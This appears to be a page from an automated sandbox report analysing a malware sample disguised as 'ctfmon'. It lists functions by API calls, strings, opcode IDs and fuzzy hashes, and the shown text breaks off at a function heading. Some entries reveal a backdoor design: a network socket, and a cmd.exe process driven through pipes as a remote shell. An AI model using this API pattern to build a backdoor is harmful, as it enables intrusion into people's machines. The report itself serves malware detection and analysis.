Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: H_prologValue
String ID:
API String ID: 3700342317-0
Opcode ID: 08febc6eb8c8e99cee7acacc4cfd95ba39e2bfe778b2f071883e8455ad0c05b3
Instruction ID: 9dde40da2586159c776057cb4fc6e6fed61ba2f5afb010fcb97a0dbd75fd19cc
Opcode Fuzzy Hash: 08febc6eb8c8e99cee7acacc4cfd95ba39e2bfe778b2f071883e8455ad0c05b3
Instruction Fuzzy Hash: D8219872A00229EFCF01DF94D482AEE7BB9FF14354F40406AF905AB250D778AE51CBA4

Function 00405040 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(76232F60), ref: 00405068

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: d6fc8d5f54c61530a5c77b9057443d1d89c53e4bab3cd9aef80dc24be2ccb722
Instruction ID: 5f64aa0511f199e587e2562682c13d905a4b2d41f00720daa4a58be541493b64
Opcode Fuzzy Hash: d6fc8d5f54c61530a5c77b9057443d1d89c53e4bab3cd9aef80dc24be2ccb722
Instruction Fuzzy Hash: 8701A5B1904750ABC210EB65DC41F5B77A8EB85B24F404A2EF055632C1DB7C9405C7AA

Function 004011C0 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(?,00000080), ref: 0040120A

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: IconLoad
String ID:
API String ID: 2457776203-0
Opcode ID: 783db8339120b3803db67abad11e484fa13dc9abfd5022a1b4a4c924fe9f323f
Instruction ID: e74f766c04b7c49422ceb5cf71cffa2e33917004825e20756c12fd70ddaf5a09
Opcode Fuzzy Hash: 783db8339120b3803db67abad11e484fa13dc9abfd5022a1b4a4c924fe9f323f
Instruction Fuzzy Hash: BCF05EB1644760AFD310EF59D941B1AB7E8FB44B60F408A1EF554D7780CBBD9404CBAA

Function 00424B39 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,?,?,?), ref: 00424B50

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 695f98c75e655a4ebf45e9277a1d54146fe03b87f83f651db76b8e19ecb3f902
Instruction ID: a506e4222beda04e1588787adb9b7428afadcb601b5091b2f91342631f0270ef
Opcode Fuzzy Hash: 695f98c75e655a4ebf45e9277a1d54146fe03b87f83f651db76b8e19ecb3f902
Instruction Fuzzy Hash: 92D0A976208362EBCB60DF60A848E4FBBE8FF943A0B014C0EF89083210C324E841CB65

Function 00424368 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: ed463503181f5831d49e387adaee184ff8ba96adf0051b103f264377ab2b9ac7
Instruction ID: 5e28298704729bcf50cadef609a26d81d9e057ba8ea632b21b4816b74d65386d
Opcode Fuzzy Hash: ed463503181f5831d49e387adaee184ff8ba96adf0051b103f264377ab2b9ac7
Instruction Fuzzy Hash: A3D09230304210AFCB05CFA0DA48A1ABBA2FF94704BA085A9E4468A121D736DC53EB49

Function 00401121 Relevance: 1.3, APIs: 1, Instructions: 20sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0001D4C0), ref: 0040113C

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c96f40a7069d522f032c98d5448b60f698f4b6c1c1402176db7ae5b90fe826fb
Instruction ID: aeaeee24bf346ca11c663ef522bbd7e48f8dbd3ce84c7fe3779714f86709666c
Opcode Fuzzy Hash: c96f40a7069d522f032c98d5448b60f698f4b6c1c1402176db7ae5b90fe826fb
Instruction Fuzzy Hash: C3B092765672209BD7249B449C426C43B989B0E704F410413DA01672A183F4248A5B9A

Function 00401130 Relevance: 1.3, APIs: 1, Instructions: 6sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0001D4C0), ref: 0040113C

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c013994515969efd125ce41308ae6106bc53f087768421e2f80ded30106a1cfd
Instruction ID: 8d0532a3e790895bab5c54fbd4c8d4022f4858262944ead44d32b07c1e7971d2
Opcode Fuzzy Hash: c013994515969efd125ce41308ae6106bc53f087768421e2f80ded30106a1cfd
Instruction Fuzzy Hash: E7B0127652723087C3009B449C016C43AD85B0E704F410013C601772E083F424C55F9B

Non-executed Functions

Function 0041D720 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 298COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041D765
CallWindowProcA.USER32(00000000), ref: 0041D787

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Strings

#32770, xrefs: 0041D936

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID: #32770
API String ID: 2276450057-463685578
Opcode ID: 659aa437e6f9b1db763d0980aaa66f1d77c78cae941e8152d1942417593f74f3
Instruction ID: 94ad4723163bdf2d308ea6e45922d28c75bada5694cf6dcea4a57aff3eeba185
Opcode Fuzzy Hash: 659aa437e6f9b1db763d0980aaa66f1d77c78cae941e8152d1942417593f74f3
Instruction Fuzzy Hash: B4811976B0530477D620BB55EC84FEF776CEF853A5F400427FA0182292D729A985C7BA

Function 00404AD0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 268networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00404B01
htons.WS2_32(00000000), ref: 00404B33
htons.WS2_32(00000000), ref: 00404B3B
socket.WS2_32(00000002,00000001,00000000), ref: 00404B59

Strings

+*&=^^^^--------PTPM2, xrefs: 00404CE8, 00404D7E, 00404E1B

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: htons$Startupsocket
String ID: +*&=^^^^--------PTPM2
API String ID: 4109548558-2390715153
Opcode ID: e7629c067e5fdbe14b2d9f1b6ed21f636c11199621b624a142a10588866ee9f3
Instruction ID: 346ed77a3f42d4ca601688a76fa85a796bd0d35956720dbea263a7c1e4379ff6
Opcode Fuzzy Hash: e7629c067e5fdbe14b2d9f1b6ed21f636c11199621b624a142a10588866ee9f3
Instruction Fuzzy Hash: 349106715092449FD730CF24AC84AABBBF8EBD4310F44853FE54493390D779A94E9BA6

Function 00403DB0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 284pipesleepfileCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403DEF
CreatePipe.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403E01
CreateProcessW.KERNEL32 ref: 00403E8E
Sleep.KERNEL32(000003E8), ref: 00403E99
Sleep.KERNEL32(000000C8), ref: 00403EE1
PeekNamedPipe.KERNEL32(?,00000000,00001000,?,00000000,00000000), ref: 00403EF8
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00403F1B
WriteFile.KERNEL32(?,exit,00000006,?,00000000), ref: 004040F5

Strings

exit, xrefs: 004040A9
+*&=^^^^--------CMD--, xrefs: 00403F8D
cmd.exe, xrefs: 00403E0E
exit, xrefs: 004040EF

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CreatePipe$FileSleep$NamedPeekProcessReadWrite
String ID: +*&=^^^^--------CMD--$cmd.exe$exit$exit
API String ID: 4180828904-1671145255
Opcode ID: 97d2dc80daee14cd8b07cf939912a4cb6b383654e3bb96b0cd9faa687eacef6c
Instruction ID: b70c06b44eefa63bc239fc03f3aab28687b9ac6a1c24dff492d9dcfd48d6b085
Opcode Fuzzy Hash: 97d2dc80daee14cd8b07cf939912a4cb6b383654e3bb96b0cd9faa687eacef6c
Instruction Fuzzy Hash: 8AA18EB26043099FD714CF64D840BABBBE9BB88700F40493EF649E7380DA75AD068B56

Function 0041CF70 Relevance: 19.7, APIs: 13, Instructions: 220windowCOMMON

Download Yara Rule

APIs

CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 0041CFAA
DefWindowProcA.USER32(00000000,?,?,?), ref: 0041CFBD
IsIconic.USER32(00000000), ref: 0041CFDF
SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 0041D00C
GetWindowLongA.USER32(00000000,000000F0), ref: 0041D01B
GetWindowDC.USER32(00000000), ref: 0041D05C
GetWindowRect.USER32(00000000,?), ref: 0041D06A
InflateRect.USER32(?,000000FF,000000FF), ref: 0041D0AD
InflateRect.USER32(?,000000FF,000000FF), ref: 0041D0D0
SelectObject.GDI32(00000000,?), ref: 0041D0DE
OffsetRect.USER32(?,?,00000000), ref: 0041D134

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
String ID:
API String ID: 2215177122-0
Opcode ID: 4307d82b0b8a792f120d9466698bca061e3411348b88fecfdab8711ea9572030
Instruction ID: 4c5bc5c323774a5c2da63429ddb1a7b1421399ae9eef4e28febc03626f88aa8e
Opcode Fuzzy Hash: 4307d82b0b8a792f120d9466698bca061e3411348b88fecfdab8711ea9572030
Instruction Fuzzy Hash: EE817971604301AFC310DF68DC84EABB7E4FB89318F004A2EF94493291E775E94ACB96

Function 0041F7C0 Relevance: 12.2, APIs: 8, Instructions: 163COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,00000002), ref: 0041F7D3
SizeofResource.KERNEL32(?,00000000,?,76944920,00000000,7693CF90,?,?,?,?,?,?,?,?,0041D411,00000001), ref: 0041F7ED
LoadResource.KERNEL32(?,00000000,?,76944920,00000000,7693CF90,?,?,?,?,?,?,?,?,0041D411,00000001), ref: 0041F7F7

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Resource$FindLoadSizeof
String ID:
API String ID: 507330600-0
Opcode ID: 246115ffcb21acfb6b612898e6a96047005db1a3dcca2133cc8e3dd41b22750f
Instruction ID: 9f6e833ce4930495a174d37efbb73787bb1f77972dd9fa55e7fbf6b8b2689a6a
Opcode Fuzzy Hash: 246115ffcb21acfb6b612898e6a96047005db1a3dcca2133cc8e3dd41b22750f
Instruction Fuzzy Hash: 6C41EF327042145BE70CCE299856AAF77D2EBC9350F448A3EF946C3381DF75950AC3A5

Function 0042585B Relevance: 12.1, APIs: 8, Instructions: 72stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00425860
GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 0042587E
lstrcpynW.KERNEL32(?,?,00000104), ref: 0042588D
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004258C1
CharUpperW.USER32(?), ref: 004258D2
FindFirstFileW.KERNEL32(?,?), ref: 004258E8
FindClose.KERNEL32(00000000), ref: 004258F4
lstrcpyW.KERNEL32(?,?), ref: 00425904

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: eb2e77227feee21f3809df92a7e21bbd02d509cfcaef561014312a0744f67c22
Instruction ID: dc0638b164661f47167565fae3824bc1416e181e3646228fdecd816abe73c54b
Opcode Fuzzy Hash: eb2e77227feee21f3809df92a7e21bbd02d509cfcaef561014312a0744f67c22
Instruction Fuzzy Hash: 7F2192B1A00529EBCB20AF65EC48AEF7F7CFF05764F408126F819D2160D7348A46CBA4

Function 004013E0 Relevance: 9.1, APIs: 6, Instructions: 73windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00424368: ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376

IsIconic.USER32(?), ref: 004013F1

Part of subcall function 004267B7: __EH_prolog.LIBCMT ref: 004267BC
Part of subcall function 004267B7: BeginPaint.USER32(?,?,?,?,0040140B), ref: 004267E5

SendMessageW.USER32(?,00000027,?,00000000), ref: 00401422
GetSystemMetrics.USER32(0000000B), ref: 00401430
GetSystemMetrics.USER32(0000000C), ref: 00401436
GetClientRect.USER32(?,?), ref: 00401443
DrawIcon.USER32(?,?,?,?), ref: 00401478

Part of subcall function 00426829: __EH_prolog.LIBCMT ref: 0042682E
Part of subcall function 00426829: EndPaint.USER32(?,?,?,?,00401487), ref: 0042684B

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSendShowWindow
String ID:
API String ID: 744365313-0
Opcode ID: 1e23e38091298bc23035b615d3f8958f05cf2239797f5dc484b3318349e7e02d
Instruction ID: 3cd01a1e54c5f11bb01f4eb2d2d637b62c3ac8db24f719d817f91ceb89e6c8c0
Opcode Fuzzy Hash: 1e23e38091298bc23035b615d3f8958f05cf2239797f5dc484b3318349e7e02d
Instruction Fuzzy Hash: F0118E713043155FC214EF38DC89E6F77A9EBC8308F444A29B585C3290DA74E80A8B55

Function 00405FAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84filestringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(-0000002C,?,76228FB0,00000000,00000000,00403769,*.*,00000000), ref: 00405FD9
FindFirstFileW.KERNEL32(?,?), ref: 00405FE3
GetLastError.KERNEL32 ref: 00405FF1
SetLastError.KERNEL32(0000007B,000000FF,00000000,?), ref: 0040603C

Part of subcall function 00424A36: lstrlenW.KERNEL32(?,00000000,00406084,000000FF,?,?,?,?,?,00000000,?), ref: 00424A49

Strings

*.*, xrefs: 00405FCF, 00405FD7, 00405FE2

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorLast$FileFindFirstlstrcpylstrlen
String ID: *.*
API String ID: 334723784-438819550
Opcode ID: 0eb3c0ce6568269592c83524268b6381258269ac00d58bd2e77033d507aac4d6
Instruction ID: 5172b66741902352c281ddeba33db5bac7263c07da9d21b6aa86c91882e6205b
Opcode Fuzzy Hash: 0eb3c0ce6568269592c83524268b6381258269ac00d58bd2e77033d507aac4d6
Instruction Fuzzy Hash: 78214B72A407019BE730BB719C85E2BB298DF54764F110A3FF522B62C2EB7D8C018669

Function 004235E7 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E

GetKeyState.USER32(00000010), ref: 0042360B
GetKeyState.USER32(00000011), ref: 00423614
GetKeyState.USER32(00000012), ref: 0042361D
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00423633

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: f08a36ac8abab3e89e4425618160d51b63b8717b140772f1c211ae5f2a27efec
Instruction ID: 218882e5c383a6313f97fdf1e6bc22957306ce5396ae17cae6112ddc5d99c2e4
Opcode Fuzzy Hash: f08a36ac8abab3e89e4425618160d51b63b8717b140772f1c211ae5f2a27efec
Instruction Fuzzy Hash: 26F0BE377403A936E5303AA22C42FAA81384B90FD6F80042AB701AA2D28D9D8943467C

Function 00405B9B Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

MonitorFromWindow.USER32(?,?), ref: 00405BB0

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: FromMonitorWindow
String ID:
API String ID: 721739931-0
Opcode ID: 0ba1fc86d451cd674b8620c5ae4f720fa838888ad4e6d9ad1c3c2af6160355b6
Instruction ID: 27bb940a1f3bd50fed2c6d6a608dacda6c6e613f901876cb4841b3324aa04d70
Opcode Fuzzy Hash: 0ba1fc86d451cd674b8620c5ae4f720fa838888ad4e6d9ad1c3c2af6160355b6
Instruction Fuzzy Hash: C4F03131204609ABDF119F61CC499AF3BB8EF00344B548436FC15F51A0DB78EA55DF59

Function 0041E380 Relevance: 55.9, APIs: 37, Instructions: 426windowCOMMON

Download Yara Rule

APIs

